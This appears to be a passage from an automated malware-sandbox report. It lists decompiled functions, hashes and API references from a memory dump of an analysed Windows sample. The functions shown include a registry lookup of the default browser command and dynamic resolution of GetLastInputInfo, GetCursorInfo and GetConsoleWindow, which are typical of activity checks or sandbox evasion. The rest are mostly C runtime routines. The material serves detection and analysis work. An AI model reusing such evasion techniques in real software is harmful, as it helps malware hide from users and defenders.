Instruction ID: 0bb2a425696eaad1e840e03cb6b1d67cba19ac7ec2a577a4888382e5ddaa93e6
Opcode Fuzzy Hash: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
Instruction Fuzzy Hash: 6201F5316002016BD7267B29CC0B7BE7BB58B42305F80006EE981221D3EBBD595AC7DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C119

Strings

ios_base::failbit set, xrefs: 0040C0FB
ios_base::eofbit set, xrefs: 0040C108
ios_base::badbit set, xrefs: 0040C0D5

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F

Uniqueness

Uniqueness Score: -1.00%

Function 0041094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041094E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x45f724);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040427F(_t17, _t21);
				return _t21;
			}

0x0041095c
0x0041096b
0x00410980
0x004109ab
0x00410982
0x00410993
0x0041099c
0x004109a8
0x004109a8
0x004109b2
0x004109be

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
RegCloseKey.ADVAPI32(00000000), ref: 0041099C

Strings

http\shell\open\command, xrefs: 0041096E

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction ID: 1fd5564dc1120aea69868d5849519b592669f7fe773aa548349f028f89f009b1
Opcode Fuzzy Hash: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction Fuzzy Hash: 79F0C871500208FBDB10DA95EC09EDFBBBCEB84B52F1040A6B944E1151DA749B85C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 004013AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004013AD() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46c5e4 = _t2;
				return _t2;
			}

0x004013be
0x004013c4
0x004013c9

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
GetProcAddress.KERNEL32(00000000), ref: 004013BE

Strings

GetCursorInfo, xrefs: 004013AD
User32.dll, xrefs: 004013B2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401468() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ca80 = _t2;
				return _t2;
			}

0x00401479
0x0040147f
0x00401484

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
GetProcAddress.KERNEL32(00000000), ref: 00401479

Strings

User32.dll, xrefs: 0040146D
GetLastInputInfo, xrefs: 00401468

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401485() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ca84 = _t2;
				return _t2;
			}

0x00401496
0x0040149c
0x004014a1

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
GetProcAddress.KERNEL32(00000000), ref: 00401496

Strings

GetConsoleWindow, xrefs: 00401485
kernel32.dll, xrefs: 0040148A

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F

Uniqueness

Uniqueness Score: -1.00%

Function 00443812, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00443812(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00435507(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x74000000
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = L00450DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = L00450DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									L00431F00(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = L00450DE0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00450AE0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00450AE0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00450AE0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00443B15(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = L00450EC0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0043A504();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043695D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00443812
0x0044381d
0x00443824
0x00443826
0x00443826
0x00443828
0x00443831
0x00443833
0x00443838
0x0044383e
0x00443854
0x00443859
0x0044385c
0x00443869
0x0044386e
0x004438c2
0x004438ca
0x004438cc
0x004438ce
0x004438d1
0x004438d1
0x004438d1
0x004438d7
0x004438df
0x004438f2
0x004438f5
0x004438f7
0x004438fa
0x004438fb
0x0044391c
0x0044391f
0x0044391f
0x004438fd
0x004438fd
0x004438ff
0x0044390a
0x0044390a
0x0044390c
0x00443913
0x0044390e
0x0044390e
0x0044390e
0x0044390c
0x00443920
0x00443922
0x00443923
0x00443926
0x00443928
0x00443932
0x0044393c
0x0044392a
0x0044392a
0x0044392a
0x00443941
0x00443941
0x00443946
0x00443949
0x00443954
0x00443954
0x00443954
0x00443954
0x00443958
0x0044395f
0x00443960
0x00443963
0x00443966
0x00443966
0x00443968
0x00000000
0x00000000
0x00443980
0x00443987
0x0044398b
0x0044398e
0x00443991
0x00443993
0x00443993
0x00443993
0x00443995
0x00443998
0x0044399b
0x0044399d
0x004439a5
0x004439ab
0x004439ae
0x004439b1
0x004439b2
0x004439b5
0x004439b8
0x004439b8
0x004439bd
0x004439c0
0x00000000
0x00000000
0x004439d8
0x004439dd
0x004439e1
0x00000000
0x00000000
0x004439e5
0x004439e5
0x004439e8
0x004439e9
0x004439e9
0x004439eb
0x004439ee
0x00000000
0x00000000
0x004439f0
0x004439f3
0x004439fa
0x004439fd
0x00443a00
0x00443a16
0x00443a16
0x00443a16
0x00443a02
0x00443a02
0x00443a04
0x00443a07
0x00443a12
0x00443a09
0x00443a0c
0x00443a0c
0x00443a07
0x00000000
0x00443a00
0x004439f5
0x004439f5
0x004439f7
0x004439f7
0x0044394b
0x0044394b
0x0044394e
0x00443a19
0x00443a19
0x00443a1b
0x00443a1d
0x00443a20
0x00443a21
0x00443a22
0x00443a23
0x00443a2b
0x00443a2b
0x00443a2b
0x00443a2d
0x00443a30
0x00443a33
0x00443a35
0x00443a35
0x00443a37
0x00443a49
0x00443a4d
0x00443a50
0x00443a57
0x00443a5f
0x00443a5f
0x00443a62
0x00443a64
0x00443a75
0x00443a75
0x00443a79
0x00443a79
0x00443a7c
0x00443a7e
0x00443a81
0x00000000
0x00443a66
0x00443a66
0x00443a6c
0x00443a6c
0x00443a70
0x00443a83
0x00443a83
0x00443a87
0x00443a88
0x00443a8a
0x00443a8c
0x00443acd
0x00443acd
0x00443acf
0x00443adc
0x00443adc
0x00443ade
0x00443ae0
0x00443ae1
0x00443ae2
0x00443ae9
0x00443aec
0x00443aee
0x00443aee
0x00443aef
0x00443af1
0x00443af4
0x00443af4
0x00443af6
0x00443af8
0x00000000
0x00443af8
0x00443ad1
0x00443ad3
0x00000000
0x00000000
0x00443ad5
0x00000000
0x00000000
0x00443ad7
0x00443ada
0x00000000
0x00000000
0x00000000
0x00443ada
0x00443a93
0x00443a99
0x00443a99
0x00443a9b
0x00443a9c
0x00443a9d
0x00443a9e
0x00443aa5
0x00443aa8
0x00443aaa
0x00443aab
0x00443aad
0x00443aba
0x00443aba
0x00443abc
0x00443abe
0x00443abf
0x00443ac0
0x00443ac7
0x00443aca
0x00443acc
0x00443acc
0x00000000
0x00443acc
0x00443aaf
0x00443aaf
0x00443ab1
0x00000000
0x00000000
0x00443ab3
0x00000000
0x00000000
0x00443ab5
0x00443ab8
0x00000000
0x00000000
0x00000000
0x00443ab8
0x00443a95
0x00443a97
0x00000000
0x00000000
0x00000000
0x00443a97
0x00443a68
0x00443a6a
0x00000000
0x00000000
0x00000000
0x00443a6a
0x00443a64
0x00000000
0x0044394e
0x00443949
0x00443870
0x00443872
0x00000000
0x00443874
0x0044388a
0x0044388f
0x00443891
0x0044389d
0x004438a3
0x004438a4
0x004438a6
0x004438a8
0x004438b3
0x004438b3
0x004438b6
0x004438b8
0x004438b8
0x004438bb
0x00443893
0x00443893
0x00443893
0x00000000
0x00443891
0x00443840
0x00443840
0x00443847
0x00443848
0x0044384a
0x00443afc
0x00443b00
0x00443b05
0x00443b05
0x00443b14
0x00443b14

APIs

_strrchr.LIBCMT ref: 0044389D
__alldvrm.LIBCMT ref: 00443A9E
__alldvrm.LIBCMT ref: 00443AC0

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction ID: 66ba9c3cc4a36ed88c16bb93380f7ac1aac5537698642897c3979fdba8336104
Opcode Fuzzy Hash: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction Fuzzy Hash: A0A14672A403869FFB11CE18C8817AEBBE1EF15756F18416FE485AB382C27C9E45C758

Uniqueness

Uniqueness Score: -1.00%

Function 0045029A, Relevance: 6.2, APIs: 4, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0045029A(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E00445A9E(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E00445A9E(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t20 = _a12;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t21 = E00445A9E(_t59, _v20, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0043A504()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t25 = E00445A9E(_t59, _a8, _a12, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E00448718(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0043A504())) = 0xd;
							_t30 = E0043A4F1();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E0043F348(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E0043DB54(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
									_t35 = _t46;
									L14:
									_t36 = E004451E9(_t46, _t59, _t63, _t59, _t63, _t35);
									_t66 = _t66 + 0xc;
									__eflags = _t36 - 0xffffffff;
									if(_t36 == 0xffffffff) {
										_t37 = E0043A4F1();
										__eflags =  *_t37 - 5;
										if( *_t37 == 5) {
											 *((intOrPtr*)(E0043A504())) = 0xd;
										}
										L23:
										_t38 = E0043A504();
										E004401F5(_t63);
										_t23 =  *_t38;
										goto L31;
									}
									asm("cdq");
									_t46 = _t46 - _t36;
									_t34 = _v8;
									asm("sbb eax, edx");
									_v8 = _t34;
									__eflags = _t34;
									if(__eflags > 0) {
										L12:
										_t35 = 0x1000;
										goto L14;
									}
									if(__eflags < 0) {
										break;
									}
									goto L17;
								}
								if(__eflags > 0) {
									goto L12;
								}
								__eflags = _t46 - 0x1000;
								if(_t46 < 0x1000) {
									goto L13;
								}
								goto L12;
								L17:
								__eflags = _t46;
							} while (_t46 != 0);
							E0043DB54(_t56, _t59, _v12);
							E004401F5(_t63);
							_t66 = _t66 + 0xc;
							_t61 = 0;
							__eflags = 0;
							goto L19;
						}
						 *((intOrPtr*)(E0043A504())) = 0xc;
						goto L23;
					}
					__eflags = _t46;
					if(_t46 <= 0) {
						goto L24;
					}
					goto L6;
				}
				L1:
				return  *((intOrPtr*)(E0043A504()));
			}

0x0045029a
0x004502a4
0x004502a7
0x004502ae
0x004502b5
0x004502ba
0x004502bd
0x004502c3
0x004502d6
0x004502dd
0x004502e0
0x004502e2
0x004502e5
0x00000000
0x00000000
0x004502eb
0x004502eb
0x004502ed
0x004502f0
0x004502f2
0x004502f5
0x004503d3
0x004503d3
0x004503d5
0x0045038c
0x00450394
0x0045039e
0x004503a1
0x00450422
0x00450422
0x00450424
0x00000000
0x00450424
0x004503a3
0x004503a8
0x00000000
0x004503a8
0x004503d7
0x004503dd
0x004503e5
0x004503ec
0x004503ef
0x004503f2
0x00000000
0x00000000
0x004503fc
0x00450402
0x00450404
0x00000000
0x00000000
0x0045040b
0x00450411
0x0045041e
0x00000000
0x0045041e
0x004503d9
0x004503db
0x00000000
0x00000000
0x00000000
0x004503db
0x004502fb
0x00450305
0x00450311
0x00450314
0x00450315
0x00450317
0x00450335
0x00450338
0x0045033b
0x0045033c
0x0045033c
0x0045033e
0x00450351
0x00450351
0x00450353
0x00450356
0x0045035b
0x0045035e
0x00450361
0x004503ac
0x004503b1
0x004503b4
0x004503bb
0x004503bb
0x004503c1
0x004503c1
0x004503c9
0x004503cf
0x00000000
0x004503cf
0x00450363
0x00450364
0x00450366
0x00450369
0x0045036b
0x0045036e
0x00450370
0x0045034a
0x0045034a
0x00000000
0x0045034a
0x00450372
0x00000000
0x00000000
0x00000000
0x00450372
0x00450340
0x00000000
0x00000000
0x00450342
0x00450348
0x00000000
0x00000000
0x00000000
0x00450374
0x00450374
0x00450374
0x0045037c
0x00450382
0x00450387
0x0045038a
0x0045038a
0x00000000
0x0045038a
0x0045031e
0x00000000
0x0045031e
0x004502fd
0x004502ff
0x00000000
0x00000000
0x00000000
0x004502ff
0x004502c5
0x00000000

APIs

_free.LIBCMT ref: 004503C9

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6b1cd57fb3c8f873ddcc6af91bd6da322d07b3d6b022b6d828d73a9edfa547c6
Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
Opcode Fuzzy Hash: 6b1cd57fb3c8f873ddcc6af91bd6da322d07b3d6b022b6d828d73a9edfa547c6
Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E

Uniqueness

Uniqueness Score: -1.00%

Function 0043C481, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E0043C481(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0043C5CE(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00450BC0(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591d8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x4591a4;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00450BC0( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
